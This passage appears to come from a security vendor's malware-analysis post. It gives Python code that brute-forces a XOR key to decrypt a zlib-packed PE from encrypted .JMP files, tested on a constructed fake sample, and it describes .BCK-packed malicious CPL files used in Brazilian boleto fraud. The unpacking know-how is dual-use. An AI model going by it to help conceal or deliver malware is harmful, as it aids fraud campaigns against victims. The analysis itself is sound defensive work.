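def recover_key(blob: bytes) -> Optional[Tuple[bytes, bytes]]:
    """Recover the XOR key and the plaintext PE from an encrypted blob.

    Key bytes 0 and 1 follow from the known ZLIB header; bytes 2 and 3 are
    brute-forced (65536 candidates per header variant). A candidate is kept
    only if a short probe inflates to something starting with "MZ" and the
    whole stream then inflates cleanly, which means its Adler-32 also matched.
    """
    if len(blob) < 4:
        return None
    probe = blob[:512]
    for hdr in ZLIB_HEADERS:
        k0, k1 = blob[0] ^ hdr[0], blob[1] ^ hdr[1]
        for k2 in range(256):
            for k3 in range(256):
                key = bytes((k0, k1, k2, k3))
                try:
                    head = zlib.decompressobj().decompress(xor4(probe, key))
                except zlib.error:
                    continue
                if not head.startswith(b"MZ"):
                    continue
                try:
                    plain = decode_with_key(blob, key)
                except zlib.error:
                    continue  # probe looked right but the full stream did not verify
                if plain.startswith(b"MZ"):
                    return key, plain
    return None


# Constructed fake PE image: DOS header stub, the familiar DOS-mode string and padding.
FAKE_PE = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
    + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 1000
    + b"PE\x00\x00" + b"\x00" * 64
)
SAMPLE_KEY = b"\x5a\xa5\x03\xc3"          # constructed key, not from any real sample
SAMPLE_JMP = build_sample(FAKE_PE, SAMPLE_KEY)

if __name__ == "__main__":
    result = recover_key(SAMPLE_JMP)
    if result:
        key, pe = result
        print(f"key={key.hex()} decoded={len(pe)} bytes, starts with {pe[:2]!r}")
```

The probe-then-verify split matters: with only the header as known plaintext, a wrong key will occasionally inflate to a few bytes that happen to start with "MZ", so acceptance has to rest on the full inflate with its checksum rather than on the first two output bytes.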
Other files of interest are those with .BCK extensions – they are packed with an as yet unknown application that appears to be a commercial backup app. Just checking the head of the encrypted file is enough to see what's inside - in this case it is a malicious CPL file used in the boletos campaigns:
"refazboleto" is Portuguese for "rebuild boleto". It points to a CPL file.
Our antivirus engines are prepared to unpack and detect .JMP and .BCK files like these. These facts show how Brazilian cybercriminals are adopting new techniques as a result of the collaboration with their European counterparts.
Thanks to my colleague Alexander Liskin for help with the analysis.